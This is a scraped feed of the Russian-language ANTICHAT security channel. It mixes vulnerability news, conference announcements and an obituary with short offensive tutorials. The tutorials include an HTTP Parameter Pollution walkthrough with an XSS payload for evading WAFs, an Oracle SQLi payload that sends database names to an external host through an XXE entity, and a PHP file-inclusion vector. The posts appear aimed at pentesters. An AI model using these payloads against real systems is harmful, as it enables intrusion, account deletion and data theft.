ANTICHAT Channel
7910
@antichat
Официальный канал https://forum.antichat.ru одного из лучших форумов для специалистов в области IT
-
ANTICHAT Channel
https://xakep.ru/2022/08/26/lastpass-hacked/ blog.lastpass.com/2022/08…incident -
ANTICHAT Channel
Горячее и красивое RCE в Java Всему виной XSLT либа Xalan, которая ставит под удар различные реализации SAML аутентификации. И подобное довольно часто встречается на вебчике, в этих ваших тырпрайзах 🙃 Детальный райтап и PoC: bugs.chromium.org/p/proje…s/detail CVE и фиксы: openjdk.org/groups/…22-07-19 
-
ANTICHAT Channel
«KazHackStan» - это главная ежегодная практическая конференция, посвященная вопросам информационной безопасности, и является одной из самых масштабных IT конференций в Центральной Азии. Одним из ключевых мероприятий конференции KazHackStan 2022 - TOITARYS станет масштабная площадка по практическому пентесту на основе моделей городской инфраструктуры – полигон «CyberKümbez». Вас ждет: • keynote speaker Jayson E. Street - один из самых известных мировых хакеров • 30 докладов от известных экспертов и мировых хакеров • 3-х дневный киберполигон, на котором сразятся 20 хакерских команд за денежный приз • 5 технических воркшопов • несколько тысяч участников со всего СНГ Впервые, в рамках конференции «KazHackStan 2022» пройдут региональные киберучения Международного Союза Электросвязи (МСЭ ООН). Примите участие в самой масштабной конференции по кибербезопасности в Центральной Азии и регистрируйтесь на сайте kazhackstan.kz. 🗓 14-16 сентября 2022 г. 📍г. Алматы, Дом приемов “Бакшасарай”, ул. Тимирязева 42 к1. -
Реклама
-
ANTICHAT Channel
-
ANTICHAT Channel
Для онлайн-участников митапа будет трансляция. Присоединяйтесь во вторник 👉 youtube.com/channel/UCP50S-MEIMZVp-gjGNiHLFQ Программа The Standoff Talks 11:00 Интро от организаторов 11:20 Виктор Зварыкин — Не делайте так, как мы 12:10 Артём Кадушко — Страх и ненависть в Bulba Hackers: как мы готовимся и участвуем в The Standoff 13:20 Роман Максимов — Абузим Zabbix заказчика, или Как бедолаге стать хозяином подконтрольных узлов 14:15 Константин Полишин — RedTeam страдания SOC'а 16:10 Денис Рыбин — О том как Privacy Sandbox веб сломал, но обещал починить 16:55 Вадим Шелест и Михаил Дрягунов — Breaking Red 18:20 Илья Шапошников — MSSQL: dump linked passwords 19:10 Магама́ Базаров — Cisco Nightmare. Дьявольский пентест сетей Cisco Подпишитесь на ютуб-канал The Standoff 365 и нажмите 🔔, чтобы получить уведомление о начале трансляции. Будем там собирать полезный технический контент, без воды. -
ANTICHAT Channel
📚 Материалы с недавних конференций по ИБ Список материалов с прошедших недавно конференций по информационной безопасности. ▫️ BlackHat (только слайды) ▫️ Defcon ▫️ BSidesLV ▫️ Troopers ▫️ ARE41 ▫️ SANS ransomware summit ▫️ May Contain Hackers #redteam 
-
ANTICHAT Channel
Когда RFI === RCE, мощный вектор: gist.github.com/loknop/…1e278d4d Позволяющий получить произвольный контент из локального файла, путём обработки различными фильтрами (php://filter/convert.iconv ...). И ставящий жирную точку в кейсах вида: <?php include($_GET['file']); ?>
Без дополнительных танцев с бубном вокруг сессий, временных файлов, пробросов нагрузки. И в дополнение к райтапу, обзор с дополнительными скриптами для генерации произвольной нагрузки.
-
ANTICHAT Channel
-
ANTICHAT Channel
🎰 Доступна полная программа OFFZONE 2022 2 трека, 3 тематические зоны — 58 докладов и 3 воркшопа с отборным техническим контентом ждут вас уже на следующей неделе! Смотрите программу на сайте 
-
ANTICHAT Channel
Опубликован PoC для критической уязвимости, о которой мы писали на прошлой неделе, затрагивающей сетевые устройства с системой Realtek RTL819x на кристалле (SoC), количество которых, по оценкам, исчисляется миллионами. CVE-2022-27255 — это переполнение буфера на основе стека, которое позволяет удаленным злоумышленникам выполнять код без аутентификации, используя специально созданные SIP-пакеты с вредоносными данными SDP. CVE-2022-27255 (с оценкой серьезности 9,8 из 10) может использоваться для взлома уязвимых устройств от различных производителей оригинального оборудования (OEM): от маршрутизаторов и точек доступа до повторителей сигналов. Realtek изучила проблему еще в марте, отметив, что она затрагивает серии rtl819x-eCos-v0.x и rtl819x-eCos-v1.x, а ее эксплуатация возможна через интерфейс WAN. Ошибка представляет собой уязвимость с нулевым кликом: ее эксплуатация не требует взаимодействия с пользователем. Злоумышленнику, использующему уязвимость, для успешной атаки потребуется лишь знать внешний IP-адрес уязвимого устройства. Исследователи Faraday Security из Аргентины (Октавио Джанатиемпо, Октавио Галланд, Эмилио Коуто, Хавьер Агинага) обнаружили уязвимость в SDK Realtek для операционной системы eCos с открытым исходным кодом и раскрыли технические подробности на прошлой неделе на DEFCON. Они же разработали и представили PoC для CVE-2022-27255, который работает на маршрутизаторах Nexxt Nebula 300 Plus, а также поделились демонстрационным видео. Ресерчеры предупреждают, что если эксплойт для CVE-2022-27255 превратится в червя, он может распространиться по Интернету за считанные минуты. Несмотря на то, что исправление доступно с марта, что уязвимость все еще затрагивает миллионы устройств, на которые исправление будет доставлено еще не скоро. Неясно, сколько конкретно сетевых устройств используют чипы RTL819x, но версия SoC RTL819xD присутствовала в продуктах более чем 60 поставщиков. Среди них ASUSTek, Belkin, Buffalo, D-Link, Edimax, TRENDnet и Zyxel. Пользователям следует проверить, не уязвимо ли их сетевое оборудование, установить обновление прошивки от производителя, выпущенное после марта, если оно доступно. Помимо этого, организациям рекомендуется блокировать нежелательные запросы UDP. Материалы презентации с DEFCON вместе с эксплойтами и скриптом обнаружения CVE-2022-27255 доступны в репозитории GitHub. -
ANTICHAT Channel
-
ANTICHAT Channel
#api #params > Ничего не могу найти на сайте, может ещё что-то посмотреть? Иногда встречается сайт, на котором всего лишь несколько конечных точек. Казалось, все параметры были проверены на уязвимости, а в чек-листе отмечены любые возможные проверки на инъекции и логику. Однако, бывают уязвимости, которые не видны с первого взгляда. Например (CAPEC-460) HTTP Parameter Pollution или (CWE-472) External Control of Assumed-Immutable Web Parameter. Данные ошибки возникают из-за неожиданного поведения в функциях обработки параметров. Давайте рассмотрим первую атаку HTTP Parameter Pollution, она состоит из возможности добавления повторяющихся параметров с помощью специальных разделителей запроса. Например, у нас открыт сайт по продаже арбузов в браузере 🌐 example.com/profile.jsp?client_id=1Для кнопки "Открыть профиль" устанавливается динамически в ответе от сервера html:<a href="profile.jsp?client_id=1&action=viewА теперь изменим запрос добавив в него параметр и закодировав разделитель&как%26:🌐example.com/profile.jsp?client_id=1%26action%3DdeleteВ результате для кнопки "Открыть профиль" задаётся html:<a href="profile.jsp?client_id=1&action=delete&action=viewПри нажатии на кнопку — профиль пользователя будет удалён. Для того чтобы заставить жертву удалить свой аккаунт, нам нужно отправить ей ссылку и подождать. Это происходит, потому что Apache Tomcat 🐈 при анализе двух одинаковых параметров (action) берёт значение первого:&action=delete&action=viewВот так выглядит код на стороне сервера:String client_id = request.getParameter("client_id"); GetMethod get = new GetMethod("https://example.com/profile"); get.setQueryString("client_id=" + client_id + "&action=" + action);href_link=get.URL;Разработчик должен был учесть такое поведение и проверить возможность внедрения параметраactionвclient_idВообще, приоритет и процесс обработки параметров можно взять из этой таблицы ниже:Technology/HTTP backend | Parsing Result | Example | --------------------------------------------------------------------- ASP.NET/IIS | All occurrences | par1=val1,val2 | ASP/IIS | All occurrences | par1=val1,val2 | PHP/Apache | Last occurrence | par1=val2 | JSP Servlet/Apache Tomcat | First occurrence | par1=val1 | JSP Servlet/Oracle Application | First occurrence | par1=val1 | IBM HTTP Server | First occurrence | par1=val1 |
Так, для Server: Apache Tomcat будет взято значение из первого совпаденияaction=deleteА для Server: Apache значение уже будетaction=view— последний параметр Но не все сервера используют приоритет порядка, так, например, ASP.NET/IIS конкатенирует значения. Поэтому в случаях, когда выполнению XSS мешает санитизация или WAF, можно составить следующий payload:example.com/search?param=<audio/n="¶m="src/onerror=alert()>В результате на странице html будет<audio n="," src/onerror=alert()>и XSS успешно сработает 💣 Помимо приоритетов, нужно также вспомнить о разделителях для параметров. Существует не только привычный & (амперсанд) и , (запятая) но и ряд других символов, тут нужно обратиться к стандартам и поискать реализации. Если открыть (rfc6570) URI Template можно найти Path-Style Parameter Обычный URL будет следующим:example.com/users?role=admin&firstName=NА теперь преобразуем его в вид Path-Style:example.com/users;role=admin;firstName=NИспользование в качестве разделителя ; (точки с запятой) не повсеместно. Это приводит к различиям обработки во фреймворках и как следствие к уязвимостям, в частности, на микросервисных архитектурах: • CVE-2021-23336 — Python библиотекаurllib.parse.parse_qslне игнорирует точку с запятой. • ParseThru — Go библиотекаnet/urlне игнорирует точку с запятой и выводит предупреждениеhttp: URL query contains semicolon...Следует помнить, что уязвимость HTTP Parameter Pollution может возникать не только в URL, но и в любой части POST/GET запроса, а также в теле JSON. {"client_id":4, "client_id":17, "action":"delete"} -
ANTICHAT Channel
-
ANTICHAT Channel
-
ANTICHAT Channel
Дорогие друзья! Нам тяжело сообщать плохие новости, но мы с глубоким сожалением подтверждаем, что главный администратор, основатель и идейный вдохновитель нашего форума Егорыч+++ скоропостижно скончался на 48 году жизни. Последние полтора года он боролся с онкологическим заболеванием, о чём никто, кроме его семьи не знал и даже не догадывался. https://forum.antichat.com/threads/487719/ . -
Реклама
-
ANTICHAT Channel
-
ANTICHAT Channel
#sqli #oracle XXE via SQLi Oracle ? Из всех SQL инъекций, которые мне попадались реже всего сталкивался c ORACLE, если не считать прям каких-то редких и специфических. И недавно на пентесте обнаружил инъекцию в ORACLE. При быстром поиске возникли подозрения на XXE, но эксплуатация к сожалению, оказалась невозможна, версия уже запатчена, но вектор интересный, подробнее про этот вектор можно прочитать тут: www.netspi.com/blog/te…014-6577 Но саму SQLi полноценно эксплуатировать получилось все через тот же XMLType. В моем случае это оказался Error-Based и не нужно было думать о передаче данных в DNS записи. Пайлоад в итоге выглядит так, с выводом, как на скрине. '||(select extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE root [ <!ENTITY % jiest SYSTEM "http://'||(select owner from (select owner, rownum as rn from (select DISTINCT owner from all_tables order by owner asc)) where rn=1)||'.server/">%jiest;]>'),'/l') from dual)||'Но, в случае, если у нас слепая инъекция и у нас есть возможность достучаться до DNS, получается DNS – Based OOB SQLi. С помощью такого запроса, как выше можно отправить данные, но если нужно много данных из БД отправить, то стандартным запросом не получится, так как в DNS записях не могут быть пробелы, поэтому пробелы нужно заменить, например, с помощью функции Replace() еще и в Base64 выводить. Удобная штука при эксплуатации: https://livesql.oracle.com/ -
ANTICHAT Channel